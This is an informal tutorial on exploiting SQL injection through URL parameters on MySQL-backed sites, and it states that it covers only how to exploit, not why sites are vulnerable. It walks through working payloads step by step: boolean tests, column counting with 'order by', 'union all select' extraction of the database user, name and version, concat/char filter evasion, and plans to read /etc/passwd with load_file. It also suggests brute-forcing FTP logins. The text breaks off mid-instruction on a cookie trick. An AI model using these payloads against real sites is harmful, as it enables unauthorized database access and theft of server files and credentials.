SQL Injection Attacks

What is SQL Injection?

-SQL Injection is defined by http://www.h-spot.net/threat_glossary.htm as:
"The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."


Lesson Facts:

-This lesson uses MySQL syntax for all examples.
-This lesson does not provide reasons for why sites are vulnerable, simply how to exploit them
-This lesson only provides sql injection examples for url parameters such it is such a large subject on it's own
-This lesson gives small examples of filter evasion techniques

Let's Start!

-Some commands you will need to know:

'union all select': combines two or more select statements into one query and returns all rows
'order by': used to sort rows after a select statement is executed
'load_file()': loads a local file from the site or server examples would be .htaccess or /etc/passwd
'char()': used to change decimal ascii to strings, can be used for filter evasion--in sql injections, used in conjunction with load_file
'concat()': combines more than one column into a single column, enabling more columns to be selected than the number that are showing on the page (You will understand better later)
'--': a comment
'/*': another type of comment

-Injection SQL Queries into URL Parameters
So you've found a site: 'http://www.site.com/index.php?id=5', and want to test if it's vulnerable to SQL Injections.

1) Begin by checking if you can execute some of your own queries, so try:
/index.php?id=5 and 1=0--
If after executing the above statement, nothing has happened and the page has remained the same, you can try:
/index.php?id='
If neither of those work, for the purposes of this tutorial move on to another site.
Otherwise, if a blank page showed up you just might be in luck!

2) Now we want to find how many columns and which ones are showing when the select statement is executed so we use:
/index.php?id=5 order by 20
If you get an error decrement the number 20, if there is no error continue incrementing until you get one and then the number just before your error is the number of columns in the table you're selecting from.
Example:
/index.php?id=5 order by 15 <--returns no error, but /index.php?id=5 order by 16 <--returns an error, then we know that there are 15 columns in our select statement.

3) The next statement will null the id=5 so the script only executes our commands and not it's own, and show us which columns we can extract data from:
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- <--The comment comments out anything the script would append to the end of the statement so that only our statement is looked at.
So now look at the page and if you see any of the numbers you just typed in, you know those columns are showing, and we can gather information from them. For this example let's pretend columns 5, 7, and 9 are showing.

4) Now we can begin gathering information!
/index.php?id=null union all select 1,2,3,4,user(),6,database(),8,version(),10,11,12,1 3,14,15--
As you can see we selected values from the showing columns, what if we want to clean this up a bit, and put all of those selected values in one column? This is where concat() comes in:
/index.php?id=null union all select 1,2,3,4,concat(user(),char(58),database(),char(58) ,version()),6,7,8,9,10,11,12,13,14,15--

Now look at your page, user(), database(), and version() are all in one place, and are separated by a colon this demonstrates the use of concat() and char().

The user() will usually give something like username@localhost, but you may get lucky and get username@ipaddresshere, in this instance you can try to brute force the FTP login. The version would help you look up exploits for that version of the database() in use--but only if you're a skiddy!

5) Before we can check if we have load_file perms, we must get an FPD (Full Path Disclosure) so we know exactly where the files are located that we're trying to open. Below are some methods to get an FPD:
-/index.php?id[]=
-You could attempt to Google the full path of the site by trying something like "/home/sitename" and hoping that you'll find something in Google
-"Session Cookie Trick" <--Thanks to haZed at enigmagroup.org. In the url type: 'javascript:void(document